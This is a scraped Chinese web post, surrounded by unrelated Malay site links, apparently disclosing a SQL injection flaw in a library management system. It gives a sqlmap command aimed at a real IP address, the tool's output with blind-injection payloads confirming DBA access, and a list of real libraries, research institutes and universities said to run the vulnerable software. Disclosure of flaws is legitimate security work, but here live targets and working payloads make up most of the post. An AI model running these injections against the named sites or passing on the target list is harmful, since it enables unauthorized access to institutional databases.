某通用图书馆管理系统SQL注入_MySQL
Jun 01, 2016 pm 01:13 PM某通用图书馆管理系统SQL注入,主要是某个某页面存在SQL注射。
sqlmap.py -u http://219.242.65.10/fsweb/MakeIntert.aspx?ID=123 --is-dba<br> <br> sqlmap identified the following injection points with a total of 0 HTTP(s) requests:<br> ---<br> Place: GET<br> Parameter: ID<br> Type: boolean-based blind<br> Title: AND boolean-based blind - WHERE or HAVING clause<br> Payload: ID=123 AND 7478=7478<br> <br> Type: AND/OR time-based blind<br> Title: Oracle AND time-based blind<br> Payload: ID=123 AND 9273=DBMS_PIPE.RECEIVE_MESSAGE(CHR(105)||CHR(111)||CHR(105)||CHR(98),5)<br> ---<br> [11:34:18] [INFO] the back-end DBMS is Oracle<br> web server operating system: Windows 2008 R2 or 7<br> web application technology: Microsoft IIS 7.5, ASP.NET, ASP.NET 2.0.50727<br> back-end DBMS: Oracle<br> [11:34:18] [INFO] testing if current user is DBA<br> current user is DBA: True<br> [11:34:25] [INFO] fetched data logged to text files under '/Users/Leek/Desktop/sqlmap-dev/output/219.242.65.10'
DBA==True
在它的客户名单里测试了几个,
国家图书馆中央社会主义分馆:http://www.zysylib.org.cn/
中国科学院物理研究所:http://libiop.iphy.ac.cn/
中国科学院软研所:http://124.16.136.160:8083/iscas_lib/
还有各种大学用户,
中国矿业大学:http://219.242.65.10/fsweb/Default.aspx
华东交通大学:http://lib.ecjtu.jx.cn:80/gdweb
华北科技学院:http://211.81.174.140/
Artikel Panas
Alat panas Tag
Artikel Panas
Tag artikel panas
Notepad++7.3.1
Editor kod yang mudah digunakan dan percuma
SublimeText3 versi Cina
Versi Cina, sangat mudah digunakan
Hantar Studio 13.0.1
Persekitaran pembangunan bersepadu PHP yang berkuasa
Dreamweaver CS6
Alat pembangunan web visual
SublimeText3 versi Mac
Perisian penyuntingan kod peringkat Tuhan (SublimeText3)
Topik panas
Cara Muat Turun Pemacu untuk Monitor PnP Universal: 5 Cara
Apr 21, 2023 pm 08:55 PM
Cara Muat Turun Pemacu untuk Monitor PnP Universal: 5 Cara
Pengenalan kepada maksud meme 30 saat tentang membuat hajat semasa bekalan elektrik terputus di perpustakaan.
Mar 26, 2024 pm 01:06 PM
Pengenalan kepada maksud meme 30 saat tentang membuat hajat semasa bekalan elektrik terputus di perpustakaan.
Bagaimana untuk menulis sistem pengurusan pinjaman dalam talian yang mudah melalui PHP
Sep 27, 2023 pm 12:49 PM
Bagaimana untuk menulis sistem pengurusan pinjaman dalam talian yang mudah melalui PHP
Amalan sistem pengurusan harta pintar berdasarkan bahasa Go
Jun 20, 2023 am 09:14 AM
Amalan sistem pengurusan harta pintar berdasarkan bahasa Go
Bagaimana untuk melumpuhkan tera air universal pada Windows 11 PC dan komputer riba?
Apr 21, 2023 pm 02:49 PM
Bagaimana untuk melumpuhkan tera air universal pada Windows 11 PC dan komputer riba?
Bagaimana untuk menulis sistem pengurusan asrama pelajar yang mudah menggunakan C++?
Nov 03, 2023 am 08:07 AM
Bagaimana untuk menulis sistem pengurusan asrama pelajar yang mudah menggunakan C++?
Analisis prinsip asas sistem pengurusan pangkalan data MySQL
Mar 25, 2024 pm 12:42 PM
Analisis prinsip asas sistem pengurusan pangkalan data MySQL
